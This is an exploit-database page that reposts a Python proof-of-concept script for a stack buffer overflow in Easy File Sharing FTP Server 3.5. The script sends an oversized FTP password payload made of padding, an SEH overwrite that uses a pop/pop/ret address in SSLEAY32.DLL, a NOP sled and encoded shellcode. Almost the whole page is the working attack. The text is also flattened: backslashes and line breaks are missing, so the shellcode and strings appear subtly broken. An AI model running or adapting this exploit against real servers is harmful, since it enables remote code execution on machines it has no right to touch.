Home / exploits Easy File Sharing FTP Server 3.5 Buffer Overflow
Posted on 30 May 2014
#!/usr/bin/env python # Exploit Title: Easy File Sharing FTP Server 3.5 stack buffer overflow # Date: 27 May 2014 # Exploit Author: superkojiman - http://www.techorganic.com # Vulnerability discovered by: h07 # CVE: CVE-2006-3952 # OSVDB: 27646 # Vendor Homepage: http://www.efssoft.com # Software Link: http://www.efssoft.com/ftpserver.htm # Version: 3.5 # Tested on: Windows 8.1 Enterprise , English # : Windows 7 Enterprise SP1, English # : Windows XP SP3, English # # Description: # A buffer overflow is triggered when when a large password is sent to the # server. # # h07 found this bug in 2006, targetting EFS FTP Server 2.0. The original # exploits relied on OS DLLs to reference a pop/pop/retn address to leverage a # SEH attack. This was a bit unreliable as different versions of Windows would # have different addresses and the exploit would need to be modified with the # correct pop/pop/retn address. # # Fast forward to 2014. EFS FTP Server is now at version 3.5 (2012) and # includes new features, such as SSL support. Ironically, by adding SSL # support, they've given us a reliable pop/pop/retn address in the included # SSLEAY32.DLL! This exploit should work reliably with any Windows release. import socket import struct # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/ # msfencode -b "x00x20" -i w32-exec-calc-shellcode.bin # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1) shellcode = ( "xd9xcbxbexb9x23x67x31xd9x74x24xf4x5ax29xc9" + "xb1x13x31x72x19x83xc2x04x03x72x15x5bxd6x56" + "xe3xc9x71xfax62x81xe2x75x82x0bxb3xe1xc0xd9" + "x0bx61xa0x11xe7x03x41x84x7cxdbxd2xa8x9ax97" + "xbax68x10xfbx5bxe8xadx70x7bx28xb3x86x08x64" + "xacx52x0ex8dxddx2dx3cx3cxa0xfcxbcx82x23xa8" + "xd7x94x6ex23xd9xe3x05xd4x05xf2x1bxe9x09x5a" + "x1cx39xbd" ) payload = "x2c" payload += "A"*2559 payload += "xebx19x90x90" # jmp to nop sled + shellcode payload += struct.pack("<I", 0x10017F21) # pop/pop/ret, SSLEAY32.DLL payload += "x90"*30 payload += shellcode s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.1.130", 21)) s.recv(1024) s.send("USER anonymous ") s.recv(1024) s.send("PASS " + payload + " ") s.recv(1024) s.close()
